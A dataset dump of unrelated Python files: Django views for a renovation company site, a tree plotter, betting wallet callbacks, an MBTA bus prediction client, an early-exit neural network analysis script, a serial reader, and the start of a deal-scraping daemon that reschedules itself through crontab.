+{"seq_id":"110080822","text":"# _*_ coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom .forms import SignUpForm, FormContato\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\n# Create your views here.\ndef assine(request):\n\ttitulo = \"Bem vindo\"\n\n\tform = SignUpForm(request.POST or None)\n\n\tcontexto = {\n\t\t'titulo':titulo, \n\t\t'form':form\n\t}\n\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tcontexto = {\n\t\t\t\t'titulo':'Obrigado', \n\t\t\t\t}\n\n\t#if request.user.is_authenticated():\n\t#\ttitulo = \"Bem vindo %s\" % request.user\n\n\t# The variables used in the templates must be placed in a dictionary\n\t\n\treturn render(request, \"assine.html\", contexto)\n\ndef contato(request):\n\tform = FormContato(request.POST or None)\n\n\tcontexto = {\n\t\t'formulario':form,\n\t\t'titulo':'Contato',\n\t}\n\n\tif form.is_valid():\n\t\ttry:\n\t\t\temail = form.cleaned_data.get(\"email\")\n\t\t\tmensagem = form.cleaned_data.get(\"mensagem\")\n\t\t\tnome_completo = form.cleaned_data.get(\"nome_completo\")\n\n\t\t\t# Data for sending the email\n\t\t\tassunto = 'Contato pelo site'\n\t\t\tremetente = settings.EMAIL_HOST_USER\n\t\t\tdestinatarios = [remetente]\n\n\t\t\t# Workaround for the error \"sequence item 0: expected string or Unicode, list found\"\n\t\t\tvalues = ','.join(str(v) for v in destinatarios)\n\n\t\t\tcorpo_email = '''\n\t\t\tEnviado por: %s \\n \n\t\t\tMensagem: %s. \\n\n\t\t\temail: %s\n\t\t\t''' %(nome_completo, mensagem, email)\n\n\t\t\tsend_mail(assunto, corpo_email, remetente, [values], fail_silently=False)\n\t\t\tcontexto = {\n\t\t\t\t\t'titulo':'Contato',\n\t\t\t\t\t'mensagem':'Sua mensagem foi enviada, obrigado!'\n\t\t\t\t}\n\t\texcept:\n\t\t\tcontexto = {\n\t\t\t\t\t'formulario':form,\n\t\t\t\t\t'titulo':'Contato',\n\t\t\t\t\t'mensagem':'Desculpe, sua mensagem nao foi enviada!'\n\t\t\t\t}\n\n\treturn render(request, \"contato.html\", contexto)\n\ndef home(request):\n\tcontexto = {\n\t\t'titulo':'Home'\n\t}\n\treturn render(request, \"home.html\", contexto)\n\ndef quemsomos(request):\n\ttitulo = 'Quem Somos'\n\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\treturn render(request, \"quemsomos.html\", contexto)\n\ndef texturas(request):\n\ttitulo = 'Texturas'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"texturas.html\", contexto)\n\ndef pintura(request):\n\ttitulo = 'Pintura'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"pintura.html\", contexto)\n\ndef gesso(request):\n\ttitulo = 'Decoração em gesso'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"gesso.html\", contexto)\n\ndef pisos(request):\n\ttitulo = 'Pisos e revestimentos'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"pisos.html\", contexto)\n\ndef drywall(request):\n\ttitulo = 'Drywall'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"drywall.html\", contexto)\n\ndef predial(request):\n\ttitulo = 'Pintura predial'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"predial.html\", contexto)\n\ndef eletricos(request):\n\ttitulo = 'Eletricos e hidráulicos'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"eletricos.html\", contexto)\n","sub_path":"newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"74255019","text":"from .misc import RSPlot, RSObject, np\nfrom random import random\nimport matplotlib.animation as ani\n\n\nclass TPObject(RSObject):\n    b_vertical = True\n\n    def __init__(self, name, color, **kwargs):\n        RSObject.__init__(self, name=name, msgforecolor=color)\n        self._left = 0\n        self._top = 0\n        self._width = 0\n        self._height = 0\n        self.__dict__.update(kwargs)\n\n    ##############\n    # Properties #\n    ##############\n    @property\n    def left(self):\n        return self._left\n\n    @left.setter\n    def left(self, v):\n        self._left = v\n\n    @property\n    def top(self):\n        return self._top\n\n    @top.setter\n    def top(self, v):\n        self._top = v\n\n    @property\n    def width(self):\n        return self._width\n\n    @width.setter\n    def width(self, v):\n        self._width = v\n\n    @property\n    def height(self):\n        return self._height  # was self._width, a copy-paste bug\n\n    @height.setter\n    def height(self, v):\n        self._height = v\n\n    @property\n    def right(self):\n        return self.left + self.width\n\n    @property\n    def bottom(self):\n        return self.top + self.height\n\n    @staticmethod\n    def _(x, y):\n        if TPObject.b_vertical:\n            return x, y\n        else:\n            return y, x\n\n\nclass TPArc(TPObject):\n    f_arrow_offset = 0.05\n\n    def __init__(self, color, name='', start=None, end=None):\n        self.start = start  # node\n        self.end = end  # node\n        TPObject.__init__(self, name, color)\n        self.ax = None\n        self.graph = None\n        self.text = None\n        self.rad = (random()*0.4 - 0.2)\n\n    def draw(self, ax):\n        ex_kwargs = None\n        if self.start is None:\n            ex_kwargs = 
dict(xy=self._(self.end.left+self.end.width/2, self.end.top))\n elif self.end is not None:\n ex_kwargs = dict(arrowprops=dict(arrowstyle=\"<|-\",\n connectionstyle=\"arc3,rad=%f\" % self.rad,\n fc=\"black\"),\n xy=self._(self.start.left + self.start.width / 2, self.start.top),\n xytext=self._(self.end.left + self.end.width / 2, self.end.top))\n if ex_kwargs is not None:\n self.graph = ax.annotate(self.end.name,\n size=20, va=\"top\", ha=\"center\",\n xycoords='data',\n textcoords='data',\n bbox=dict(boxstyle=\"round4\", fc='black', alpha=.25),\n color=self.end.msgforecolor,\n **ex_kwargs)\n if self.is_valid():\n self.text = ax.annotate(self.name,\n xy=self._(self.left+self.width/2.0,\n self.top+self.height/2.0),\n xycoords='data',\n color=self._fore_color,\n ha='center')\n self.ax = ax\n\n def redraw(self):\n if self.graph is not None:\n self.graph.remove()\n del self.graph\n if self.text is not None:\n self.text.remove()\n del self.text\n if self.ax is not None:\n self.draw(self.ax)\n\n def is_valid(self):\n return self.start is not None and self.end is not None\n\n ##############\n # properties #\n ##############\n @property\n def left(self):\n if self.is_valid():\n return self.start.left if self.start.left < self.end.left else self.end.left\n\n @property\n def top(self):\n if self.is_valid():\n return self.start.top\n\n @property\n def width(self):\n if self.is_valid():\n return abs(self.start.left - self.end.left)\n\n @property\n def height(self):\n if self.is_valid():\n return self.end.top - self.start.top\n\n\nclass TPNode(TPObject):\n def __init__(self, name, color, **kwargs):\n self.children = []\n self._parent = None\n TPObject.__init__(self, name, color, **kwargs)\n self.arc = TPArc(color, start=self.parent, end=self)\n self.text = None\n self.text_height = 0.2\n\n def calc_rect(self):\n if len(self.children) > 0:\n self.b_vertical = True\n max_child_height = 0\n self.width = 0\n for child in self.children:\n child.left = self.left + self.width\n child.top = self.top + 1\n child.calc_rect()\n self.width += child.width + 1\n if child.height > max_child_height:\n max_child_height = child.height\n self.height = max_child_height + 1\n self.width -= 1\n\n def draw(self, ax):\n self.arc.draw(ax)\n for child in self.children:\n child.draw(ax)\n pass\n\n def redraw(self):\n self.arc.redraw()\n\n def add_child(self, node):\n node.parent = self\n self.children.append(node)\n\n ##############\n # Properties #\n ##############\n @property\n def parent(self):\n return self._parent\n\n @parent.setter\n def parent(self, node):\n self._parent = node\n self.arc.start = node\n\n\nclass TreePlot(RSPlot):\n def __init__(self, tree, width, height, **kwargs):\n RSObject.__init__(self)\n self.tree = tree\n self.width = width\n self.height = height\n self.b_vertical = True\n self.__dict__.update(kwargs)\n\n def plot(self, ax=None, **kwargs):\n fig = plt.figure(figsize=(self.width, self.height))\n ax = fig.add_subplot(111)\n ax.axis('off')\n self.tree.top = 0.1\n self.tree.calc_rect()\n TPObject.b_vertical = self.b_vertical\n ax.set_xlim(-0.1, self.tree.width + 0.1)\n ax.set_ylim(-0.1, self.tree.height / 2 + 0.1)\n self.tree.draw(ax)\n return fig\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n a = TPNode('A', 'red')\n b = TPNode('B', 'blue')\n c = TPNode('C', 'green')\n d = TPNode('D', 'blue')\n e = TPNode('E', 'red')\n f = TPNode('F', 'yellow')\n g = TPNode('G', 'cyan')\n h = TPNode('h', 'pink')\n i = TPNode('i', 'white')\n j = TPNode('j', 'black')\n k = TPNode('k', 'pink')\n l = 
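TPArc.draw above renders arcs with annotate's arc3 connection style; a standalone matplotlib sketch of just that technique, with arbitrary demo coordinates:

import matplotlib.pyplot as plt

fig, ax = plt.subplots()
# curved arrow between two points, as TPArc does between parent and child nodes
ax.annotate('child', xy=(0.2, 0.8), xytext=(0.8, 0.2),
            ha='center', va='top',
            arrowprops=dict(arrowstyle='<|-', connectionstyle='arc3,rad=0.2'))
plt.show()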
TPNode('l', 'yellow')\n    m = TPNode('m', 'cyan')\n\n    a.add_child(b)\n\n    a.add_child(k)\n    a.add_child(l)\n\n    a.add_child(c)\n\n    b.add_child(d)\n    b.add_child(e)\n    b.add_child(m)\n\n    c.add_child(f)\n    f.add_child(g)\n    f.add_child(h)\n    f.add_child(i)\n    f.add_child(j)\n\n    tp = TreePlot(a, 5, 5, b_vertical=True)\n    tp.plot()\n    plt.show()\n\n","sub_path":"treeplot.py","file_name":"treeplot.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"369923189","text":"from django.db import transaction, connection\n\nfrom betmaster_test import models\nfrom betmaster_test.exceptions import BetmasterError\nfrom betmaster_test.models import TransactionStatus, Wallet, TransactionTypes\n\n\nclass Callbacks:\n\n    def success(self, tr: models.Transaction):\n        \"\"\"\n        This method must be called from the payment system's on_success callback.\n\n        The method locks the wallet row, so the transaction that calls it\n        should be as short as possible.\n        \"\"\"\n        assert tr.type == TransactionTypes.DEPOSIT, \"only deposits are supported for now\"\n\n        self.validate(tr)\n\n        # lock the wallet row before modifying it\n        wallet = Wallet.objects.select_for_update().get(id=tr.wallet_id)\n        wallet.balance += tr.amount\n        wallet.save()\n\n        tr.status = TransactionStatus.SUCCESS\n        tr.save()\n\n    def failure(self, tr: models.Transaction):\n        \"\"\"\n        This method must be called from the payment system's on_error callback.\n        \"\"\"\n        self.validate(tr)\n\n        tr.status = TransactionStatus.FAILED\n        tr.save()\n\n    def validate(self, tr: models.Transaction):\n        if tr.status != TransactionStatus.PROCESSING:\n            raise BetmasterError(\"invalid transaction status\", transaction=tr)\n\n","sub_path":"betmaster_test/services/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"495358611","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Filename: test.py\n\nfrom __future__ import print_function\n\n\ndef is_even_num(num):\n    if num % 2 == 0:\n        return True\n    else:\n        return False\n\ns = 0\nfor i in range(10):\n    if is_even_num(i):\n        print(i)\n        s += 1\n\nprint(\"has \", s, \" even numbers\")\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"334386262","text":"\"\"\"MBTA arrival predictions for buses at a given stop from the MBTA.\"\"\"\nimport configparser\nimport datetime\nimport logging\nimport logging.handlers\nimport math\nimport pprint\nimport string\nimport xml.etree.ElementTree as ET\nimport time\nimport requests\n\nconfig = configparser.ConfigParser()\n\ntry:\n    assert __name__ == '__main__'\n    config.read('mbta.conf')\nexcept AssertionError:\n    config.read('infomatic.conf')\nelse:\n    pass\nfinally:\n    MAXLOGSIZE = config.getint('Logging', 'maxlogsize')\n    ROTATIONCOUNT = config.getint('Logging', 'rotationcount')\n    LOGFILE = config.get('Logging', 'logfile')\n\n    # create logger\n    logger = logging.getLogger(__name__)\n    # logger.setLevel(logging.INFO)\n    logger.setLevel(logging.DEBUG)\n    # create file handler which logs even debug messages\n    logger_fh = logging.handlers.RotatingFileHandler(LOGFILE,\n                                                     maxBytes=MAXLOGSIZE,\n                                                     backupCount=ROTATIONCOUNT)\n    logger_fh.setLevel(logging.DEBUG)\n    # create console handler with a higher log level\n    logger_ch = logging.StreamHandler()\n    logger_ch.setLevel(logging.ERROR)\n    # create 
formatter and add it to the handlers\n logger_formatter = logging.Formatter('%(asctime)s'\n + ' %(levelname)s'\n + ' %(name)s[%(process)d]'\n + ' %(message)s')\n logger_fh.setFormatter(logger_formatter)\n logger_ch.setFormatter(logger_formatter)\n # add the handlers to the logger\n logger.addHandler(logger_fh)\n logger.addHandler(logger_ch)\n\n\nclass BusStop(object):\n \"\"\"Class representing a stop for an MBTA bus or buses.\"\"\"\n\n def __init__(self, stop, **kwargs):\n \"\"\"Create Stop object.\"\"\"\n super().__init__(**kwargs)\n try:\n # self.logger = \\\n # logging.getLogger(__name__ + '.' + __name__ + '.'\n # + self.__class__.__name__)\n self.api_key = config.get('MBTA', 'apikey')\n\n self.stop = stop\n logger.info('Instantiating %s %s',\n self.__class__.__name__, self.stop)\n self.base = 'http://realtime.mbta.com/developer/api'\n self.version = 'v2'\n self.endpoint = 'predictionsbystop'\n self.url = self.base + '/' + self.version + '/' + self.endpoint\n self.payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n self._predictions_last_updated = time.time()\n self.predictionsbystop()\n self.routesbystop()\n self.schedulebystop()\n self.alertsbystop()\n except Exception as e:\n raise\n finally:\n pass\n\n def predictionsbystop(self):\n \"Docstring goes here.\"\n try:\n BASE = config.get('MBTA', 'base')\n VERSION = config.get('MBTA', 'version')\n _payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n _url = BASE + '/' + VERSION + '/predictionsbystop'\n response = requests.get(_url, params=_payload)\n root = ET.fromstring(response.text)\n self._predictions = {}\n self._predictions['routes'] = {}\n for elem in root.iter():\n if elem.tag == 'predictions':\n self._predictions['stop_name'] = elem.get('stop_name')\n self._predictions['stop_id'] = elem.get('stop_id')\n if elem.tag != 'route':\n continue\n self._predictions['routes'][elem.get('route_name')] = {}\n _etas = []\n for trip in elem.iter():\n if trip.tag != 'trip':\n continue\n _etas.append(\n str(math.floor(int(trip.get('pre_away'))\n / 60)) + chr(160) + 'min.')\n _trip_headsign = trip.get('trip_headsign')\n self._predictions['routes'][elem.get(\n 'route_name')]['etas'] = _etas\n self._predictions['routes'][elem.get(\n 'route_name')]['trip_headsign'] = _trip_headsign\n logger.info('Predictions <%s> %s %s [%s]',\n self._predictions['stop_name'],\n elem.get('route_name'),\n _etas, _trip_headsign)\n except Exception as e:\n raise\n finally:\n pass\n\n @property\n def predictions(self):\n pass\n\n @predictions.getter\n def predictions(self):\n _now = time.time()\n if (_now - self._predictions_last_updated) > 59:\n self.predictionsbystop()\n self._predictions_last_updated = _now\n return self._predictions\n\n def routesbystop(self):\n \"Docstring goes here.\"\n try:\n BASE = config.get('MBTA', 'base')\n VERSION = config.get('MBTA', 'version')\n _payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n _url = BASE + '/' + VERSION + '/routesbystop'\n response = requests.get(_url, params=_payload)\n root = ET.fromstring(response.text)\n self._routes = [route.get('route_name')\n for route in root.findall('.//*[@route_id]')]\n except Exception as e:\n raise\n finally:\n pass\n\n @property\n def routes(self):\n pass\n\n @routes.getter\n def routes(self):\n return self._routes\n\n def schedulebystop(self):\n \"Docstring goes here.\"\n try:\n BASE = config.get('MBTA', 'base')\n VERSION = config.get('MBTA', 'version')\n _payload = {'api_key': self.api_key,\n 'stop': 
self.stop,\n 'format': 'xml'}\n _url = BASE + '/' + VERSION + '/schedulebystop'\n response = requests.get(_url, params=_payload)\n root = ET.fromstring(response.text)\n self._schedule = {}\n self._schedule['routes'] = {}\n for elem in root.iter():\n if elem.tag == 'schedule':\n self._schedule['stop_name'] = elem.get('stop_name')\n self._schedule['stop_id'] = elem.get('stop_id')\n if elem.tag != 'route':\n continue\n self._schedule['routes'][elem.get('route_name')] = []\n for trip in elem.iter():\n if trip.tag != 'trip':\n continue\n self._schedule['routes'][elem.get('route_name')].append(\n datetime.datetime.fromtimestamp(\n int(trip.get(\n 'sch_arr_dt'))).strftime('%I:%M:%S %p'))\n except Exception as e:\n raise\n finally:\n pass\n\n @property\n def schedule(self):\n pass\n\n @schedule.getter\n def schedule(self):\n return self._schedule\n\n def alertsbystop(self):\n \"Docstring goes here.\"\n try:\n BASE = config.get('MBTA', 'base')\n VERSION = config.get('MBTA', 'version')\n _payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n _url = BASE + '/' + VERSION + '/alertsbystop'\n response = requests.get(_url, params=_payload)\n root = ET.fromstring(response.text)\n self._alerts = {}\n except Exception as e:\n raise\n finally:\n pass\n\n @property\n def alerts(self):\n pass\n\n @alerts.getter\n def alerts(self):\n return self._alerts\n\n\nif __name__ == '__main__':\n pp = pprint.PrettyPrinter(indent=4)\n foo = BusStop('639')\n pp.pprint(foo.predictions)\n pp.pprint(foo.routes)\n pp.pprint(foo.schedule)\n pp.pprint(foo.alerts)\n bar = BusStop('599')\n pp.pprint(bar.predictions)\n pp.pprint(bar.routes)\n pp.pprint(bar.schedule)\n pp.pprint(bar.alerts)\n","sub_path":"mbta/mbta.py","file_name":"mbta.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"628882183","text":"import json\nimport pandas as pd\nimport numpy as np\nfrom pandas.io.json import json_normalize\nimport argparse\nfrom tqdm import tqdm\n\ndef MultiHotEncode(_labels, _scores, n_classes=100):\n '''Return topk labels and scores as multihot encoded vector. \n Missing labels are padded with minus one.\n Missing scores are padded with zeros'''\n retLabels, retScores = [], []\n \n # dimensionality check\n if not len(_labels.shape) == len(_scores.shape):\n raise Exception('Dimensionality must match')\n \n # if only one dimensio\n if len(_labels.shape) == 1:\n multihotlabels = np.negative(np.ones(n_classes))\n multihotscores = np.zeros(n_classes)\n for l, s in zip(_labels, _scores):\n #print(l)\n multihotlabels[l] = l\n multihotscores[l] = s\n retLabels.append(multihotlabels)\n retScores.append(multihotscores)\n \n # mulitple dimension\n else: \n for n in range(_labels.shape[0]):\n multihotlabels = np.negative(np.ones(n_classes))\n multihotscores = np.zeros(n_classes)\n for l, s in zip(_labels[n], _scores[n]):\n #print(l)\n multihotlabels[l] = l\n multihotscores[l] = s\n retLabels.append(multihotlabels)\n retScores.append(multihotscores)\n return np.array(retLabels), np.array(retScores)\n\ndef Confidence(_labels, _scores, n_classes, selection='additive', weights = None):\n '''\n Return the confidence score prediction as an addition of prediction or max selection.\n If weights are given each prediction score are weighted accordingly. 
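The `predictions` getter in `mbta.py` above refreshes its cached API response only when it is more than 59 seconds old. The same staleness-check pattern in isolation, as a self-contained sketch (the class and names here are illustrative, not part of the module):

```python
import time

class TimedCache:
    """Re-run an expensive fetch only when the cached value is stale."""

    def __init__(self, fetch, max_age=59):
        self._fetch = fetch            # zero-argument callable
        self._value = fetch()          # prime the cache
        self._updated = time.time()
        self._max_age = max_age

    @property
    def value(self):
        now = time.time()
        if (now - self._updated) > self._max_age:
            self._value = self._fetch()
            self._updated = now
        return self._value

cache = TimedCache(lambda: time.time())
print(cache.value)  # unchanged until 59 seconds have elapsed
```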
\n If sparse prediction vector are provided and prediction labels are not consistent,\n expansion to full dimensionality is performed.\n '''\n \n # transform to numpy arrays\n _labels = np.array(_labels)\n _scores = np.array(_scores)\n \n # weight prediction by multiplying weight vector\n if weights:\n weights = np.array(weights)[:_scores.shape[0]]\n _scores = np.multiply(_scores, weights[:, None])\n\n # if sparse labels does not match transformation to original class space is required\n if n_classes != _labels.shape[0]:\n _labels, _scores = MultiHotEncode(_labels, _scores, n_classes)\n \n # Sum across predtion or take max\n if selection == 'additive':\n _scores = _scores.sum(axis=0)\n elif selection == 'max':\n _scores = _scores.max(axis=0)\n else:\n raise Exception(\"Selection is required. Either 'additive' or 'max'\")\n\n _scores = _scores[_scores != 0]\n _labels = _labels[_labels != -1]\n\n _labels = np.unique(_labels)\n \n # find best prediction\n idx = np.argmax(_scores)\n best = (_labels[idx], _scores[idx])\n \n return best\n\ndef ScoreMargin(_labels, _scores, selection='additive', weights = None):\n '''\n Return the score-margin prediction as a addition of provided predictions or a max selection.\n If weights are given each prediction score are weighted accordingly. \n '''\n \n # transform to numpy arrays\n _labels = np.array(_labels)\n _scores = np.array(_scores)\n \n # weight prediction by multiplying weight vector\n if weights:\n weights = np.array(weights)[:_scores.shape[0]]\n _scores = np.multiply(_scores, weights[:, None])\n\n # create list of labels from prediction with no duplicates and corresponding score list\n labellist = []\n scorelist = []\n for label, score in zip(_labels,_scores):\n _score_margin = (score[0] - score[1])\n if selection == 'additive':\n if label[0] not in labellist:\n labellist.append(label[0].astype(int))\n scorelist.append(_score_margin)\n else:\n idx = labellist.index(label[0])\n scorelist[idx] += _score_margin\n if selection == 'max':\n if label[0] not in labellist:\n labellist.append(label[0].astype(int))\n scorelist.append(_score_margin)\n ##### should i sort??? 
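To make the padding scheme above concrete: `MultiHotEncode` expands a top-k prediction such as `labels=[2, 5]`, `scores=[0.7, 0.2]` to full class dimensionality, padding missing labels with -1 and missing scores with 0, and `Confidence` with `selection='additive'` then sums the expanded score rows before taking the argmax. A small worked example restating that expansion (independent of the module, so it runs standalone):

```python
import numpy as np

def multihot(labels, scores, n_classes=8):
    # Same idea as MultiHotEncode above for one 1-D prediction:
    # missing labels become -1, missing scores become 0.
    lab = np.full(n_classes, -1.0)
    sco = np.zeros(n_classes)
    for l, s in zip(labels, scores):
        lab[l] = l
        sco[l] = s
    return lab, sco

l1, s1 = multihot([2, 5], [0.7, 0.2])   # exit 1 of an early-exit net
l2, s2 = multihot([5, 3], [0.6, 0.3])   # exit 2
print(s1)               # [0.  0.  0.7 0.  0.  0.2 0.  0. ]
summed = s1 + s2        # additive fusion across the two exits
print(summed.argmax())  # 5, since 0.2 + 0.6 outweighs 0.7
```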
i font think so...\n # find best prediction\n idx = np.argmax(np.array(scorelist))\n best = (labellist[idx], scorelist[idx])\n return best\n\ndef delay_threshold_test(df, n_classes, platform, model_type):\n post_prediction = pd.DataFrame()\n for delay_threshold in tqdm(np.arange(0, 451,1)):\n n = conventional = maximum = addition = addition_w = missed = sm_additive = sm_additive_w = sm_max = 0\n if model_type == 'msdnet':\n n_exits = 5\n elif model_type == 'b-resnet' or model_type == 'b-densenet':\n n_exits = 4\n else:\n n_exits = 1\n which_exits = np.zeros(n_exits)\n for i, data in df.groupby(['sample']):\n # find predictions within time frame\n\n timings = data['time'].tolist()\n cum_timings = np.cumsum(timings)\n exits = len([time for time in cum_timings if time < delay_threshold])\n \n n += 1\n if exits != 0:\n \n which_exits[exits-1] += 1\n\n # filter predictions within time frame\n #labels, scores = np.array(data.prediction.tolist()[:exits]), np.array(data.scores.tolist()[:exits])\n\n #score_additive_w = ScoreMargin(labels, scores, 'additive', args.weights)\n #score_additive = ScoreMargin(labels, scores, 'additive')\n #score_max = ScoreMargin(labels, scores, 'max')\n\n #labels, scores = MultiHotEncode(labels,scores)\n #addtest = Confidence(labels, scores, n_classes, selection='additive')\n #addtest_w = Confidence(labels, scores, n_classes, selection='additive', weights=args.weights)\n \n \n #maxtest = Confidence(labels, scores, n_classes, selection='max')\n target = data.target.tolist()\n\n #addition_w += (addtest_w[0]== target[0])\n #addition += (addtest[0]==target[0])\n #maximum += (maxtest[0] == target[0])\n conventional += (target[0] == data.prediction.tolist()[exits-1][0])\n #sm_additive_w += (target[0] == score_additive_w[0])\n #sm_additive += (target[0] == score_additive[0])\n #sm_max += (target[0]==score_max[0])\n else:\n missed +=1\n\n if n != 0:\n post_prediction = post_prediction.append({\n 'Delay Threshold': delay_threshold,\n 'Exit' : which_exits,\n 'N': n,\n 'missed': missed,\n 'latest': conventional / n,\n #'confidence (max)' : maximum / n,\n #'confidence (add)' : addition / n,\n #'confidence (add,weighted)' : addition_w / n,\n #'score-margin (max)' : sm_max / n,\n #'score_margin (add)' : sm_additive / n,\n #'score-margin (add,weighted)' : sm_additive_w / n\n }, ignore_index = True)\n else:\n post_prediction = post_prediction.append({\n 'Delay Threshold': delay_threshold,\n 'N': n+missed\n }, ignore_index = True)\n\n print(post_prediction)\n post_prediction.to_json('edge_test/' + platform + '_merge_' + model_type + '_analysis.json')\n\ndef lost_prediction_test(df, args):\n \n post_prediction = []\n if args.model_type == 'msdnet':\n exits = 5\n else:\n exits = 4\n for k in range(1,exits+1):\n\n n = conventional = maximum = addition = addition_w = sm_additive = sm_additive_w = sm_max = 0\n for _, data in df.groupby(['sample']):\n n += 1\n labels, scores = np.array(data.prediction.tolist()[:k]), np.array(data.scores.tolist()[:k])\n\n score_additive_w = ScoreMargin(labels, scores, 'additive', weights=args.weights)\n score_additive = ScoreMargin(labels, scores, 'additive')\n score_max = ScoreMargin(labels, scores, 'max')\n\n labels, scores = MultiHotEncode(labels,scores)\n addtest = Confidence(labels, scores, selection='additive')\n addtest_w = Confidence(labels, scores, selection='additive', weights=args.weights)\n \n \n maxtest = Confidence(labels, scores, selection='max')\n target = data.target.tolist()\n\n addition_w += (addtest_w[0]== target[0])\n addition += 
(addtest[0]==target[0])\n maximum += (maxtest[0] == target[0])\n conventional += (target[0] == data.prediction.tolist()[k-1][0])\n sm_additive_w += (target[0] == score_additive_w[0])\n sm_additive += (target[0] == score_additive[0])\n sm_max += (target[0]==score_max[0])\n\n post_prediction.append({\n 'exit' : k-1,\n 'N Exits' : n,\n 'latest': conventional / n,\n 'confidence (max)' : maximum / n,\n 'confidence (add)' : addition / n,\n 'confidence (add,weighted)' : addition_w / n,\n 'score-margin (max)' : sm_max / n,\n 'score_margin (add)' : sm_additive / n,\n 'score-margin (add,weighted)' : sm_additive_w / n\n })\n\n post_prediction = pd.DataFrame(post_prediction)\n post_prediction.to_json(args.name +'_lost_prediction_analysis.json')\n\ndef main(platform, model_type, test):\n with open('local/' + platform + '_' + model_type + '_offload.json', 'r') as json_file:\n data = json.load(json_file)\n\n df = pd.DataFrame()\n df = json_normalize(data,)\n\n if test == 'delay-threshold':\n delay_threshold_test(df, 100, platform, model_type)\n elif args.test == 'lost-prediction':\n lost_prediction_test(df, args)\n else:\n raise Exception('test must be specified')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Analyze edge offloading results')\n parser.add_argument('--platform', default='gpu')\n parser.add_argument('--test', default='delay-threshold'),\n parser.add_argument('--model-type', default='b-resnet'),\n parser.add_argument('--weights', default=[1,1.2,1.4,1.6,1.6])\n args = parser.parse_args()\n with open('local/' + args.platform + '_local_' + args.model_type + '.json', 'r') as json_file:\n data = json.load(json_file)\n\n df = pd.DataFrame()\n df = json_normalize(data,)\n\n if args.test == 'delay-threshold':\n delay_threshold_test(df, 100, args.platform, args.model_type)\n elif args.test == 'lost-prediction':\n lost_prediction_test(df, args)\n else:\n raise Exception('test must be specified')\n ","sub_path":"DDNN/analyze_local.py","file_name":"analyze_local.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"221336285","text":"#!/usr/bin/env python\nimport serial\n\n\nwith serial.Serial('/dev/ttyS11', 115200) as ser:\n x = ser.read(5) # read one byte\n print(x)\n # s = ser.read(10) # read up to ten bytes (timeout)\n # print(s)\n # line = ser.readline() # read a '\\n' terminated line\n # print line\n","sub_path":"python_serial/serial_reciever.py","file_name":"serial_reciever.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440761680","text":"from urllib.request import urlopen\nimport socket\nimport os\nimport pymongo\nimport logging\nfrom bs4 import BeautifulSoup\nfrom crontab import CronTab\nimport datetime as dt\nfrom time import strptime, mktime\nimport numpy as np\nimport re\nfrom email.mime.text import MIMEText\nfrom subprocess import Popen, PIPE\n \ndef set_next_start(delay):\n next_start = dt.datetime.now() + dt.timedelta(minutes=delay)\n tab = CronTab()\n cmd = 'python3 /home/louis/prog/Dealabs/daemon.py'\n cron_job = tab.new(cmd, comment='Dealabs daemon')\n cron_job.setall(next_start)\n #writes content to crontab\n tab.write_to_user(user=True)\n\ndef get_delay(mu, sigma):\n delay = max(int(np.random.normal(mu, sigma)), 1)\n return delay\n\ndef is_night():\n now = dt.datetime.now()\n return dt.time(0,30) <= now.time() <= dt.time(6,30)\n\ndef is_flame(soup):\n 
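`get_delay` and `set_next_start` above implement randomized polling for the Dealabs daemon: the next cron run is scheduled `max(N(mu, sigma), 1)` minutes ahead, so the site is not hit on a fixed, detectable cadence, and `is_night` allows different behaviour between 00:30 and 06:30. The jitter logic in isolation, with no crontab dependency (the mu/sigma values are illustrative):

```python
import datetime as dt
import numpy as np

def get_delay(mu, sigma):
    # At least one minute, normally distributed around mu.
    return max(int(np.random.normal(mu, sigma)), 1)

def is_night(now=None):
    now = now or dt.datetime.now()
    return dt.time(0, 30) <= now.time() <= dt.time(6, 30)

# Poll roughly every 15 minutes by day, backing off at night.
delay = get_delay(45, 10) if is_night() else get_delay(15, 5)
next_start = dt.datetime.now() + dt.timedelta(minutes=delay)
print(f"next run at {next_start:%H:%M}")
```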
